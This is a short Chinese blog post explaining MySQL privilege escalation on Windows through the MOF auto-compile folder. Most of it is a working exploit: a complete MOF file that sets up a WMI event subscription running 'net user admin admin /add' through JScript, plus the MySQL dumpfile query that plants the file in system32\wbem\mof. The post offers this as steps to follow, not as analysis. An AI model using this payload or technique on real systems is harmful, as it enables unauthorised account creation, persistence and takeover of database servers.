美文网首页
【提权】MySQL提权之MOF

【提权】MySQL提权之MOF

作者: Pino_HD | 来源:发表于2018-04-18 14:20 被阅读0次

    0x01 前言

    Windows管理规范(WMI)提供了如下三种方法编译WMI存储库的托管对象格式(MOF)文件:

    • 将MOF文件执行为命令行参数及Mofcomp.exe文件
    • 使用IMofCompiler借口和$CompileFile方法
    • 拖放到%SystemRoot%\System32\Wbem\MOF文件夹下的MOF文件中

    使用MOF提权的前提是当前root账户可以复制文件到%SystemRoot%\System32\Wbem\MOF目录下。

    0x02 漏洞利用方法

    1. 将一下代码保存为nullevt.mof文件
    #pragma namespace("\\.\root\subscription")
    instance of __EventFilter as $EventFilter
    {
    EventNamespace = "Root\\Cimv2";
    Name  = "filtP2";
    Query = "Select * From __InstanceModificationEvent "
    "Where TargetInstance Isa \"Win32_LocalTime\" "
    "And TargetInstance.Second = 5";
    QueryLanguage = "WQL";
    };
    
    instance of ActiveScriptEventConsumer as $Consumer
    {
    Name = "consPCSV2";
    ScriptingEngine = "JScript";
    ScriptText =
    "var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"net.exe user admin admin /add\")";
    };
    
    instance of __FilterToConsumerBinding
    {
    Consumer   = $Consumer;
    Filter = $EventFilter;
    };
    
    1. 通过MySQL查询将文件导入
    select load_file('c:\\recycler\\nullevt.mof') into dumpfile 'c:/windows/system32/wbem/mof/nullevt.mof';
    

    导入后,系统会自动运行该文件。

    相关文章

      网友评论

          本文标题:【提权】MySQL提权之MOF

          本文链接:https://www.haomeiwen.com/subject/rykvkftx.html